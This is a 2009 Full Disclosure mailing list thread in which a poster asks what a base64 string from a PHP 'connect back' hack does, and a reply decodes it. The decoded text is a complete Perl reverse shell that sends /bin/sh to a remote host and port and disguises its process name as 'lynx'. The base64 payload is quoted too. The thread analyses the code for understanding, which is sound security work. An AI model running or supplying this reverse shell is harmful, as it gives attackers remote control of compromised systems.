Full Disclosure mailing list archives
Re: connect back PHP hack
From: Augusto Pereyra <aepereyra () gmail com>
Date: Tue, 10 Feb 2009 23:37:45 -0300
This is encoded in base64
If you decode it i will see the next program
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
If you want do it your self visit
http://www.motobit.com/util/base64-decoder-encoder.asp paste the
base64 code and you will see the light.
Cool!!!!
Best regard Augusto Pereyra
ΓΏ
On Tue, Feb 10, 2009 at 3:23 PM, sr. <staticrez () gmail com> wrote:
can anyone tell me what encoding this is? $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; this has to do with old php 4.x.x version with magic quotes enabled. i'm just trying to figure out what the connect back code does. any input is much appreciated. thx, sr.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- [SPAM] Re: connect back PHP hack, (continued)
- [SPAM] Re: connect back PHP hack Ricky Zhou (Feb 10)
- Re: connect back PHP hack Anastasios Monachos (Feb 10)
- Re: connect back PHP hack Gustavo Castro (Feb 10)
- Re: connect back PHP hack sr. (Feb 10)
- Re: connect back PHP hack Justin Rogosky (Feb 11)
- Re: connect back PHP hack sr. (Feb 10)
- Re: connect back PHP hack ilaiy (Feb 10)
- Re: connect back PHP hack Joe Klemencic (Feb 10)
- Re: connect back PHP hack crony (Feb 10)
- Re: connect back PHP hack Joren Gaucher (Feb 10)
- Re: connect back PHP hack Clement Dupuis (Feb 10)
- Re: connect back PHP hack Augusto Pereyra (Feb 11)
- Re: connect back PHP hack Fredrick Diggle (Feb 11)
- Re: connect back PHP hack Juha-Matti Laurio (Feb 10)
- Re: connect back PHP hack mathewm (Feb 10)
- Re: connect back PHP hack el8 (Feb 11)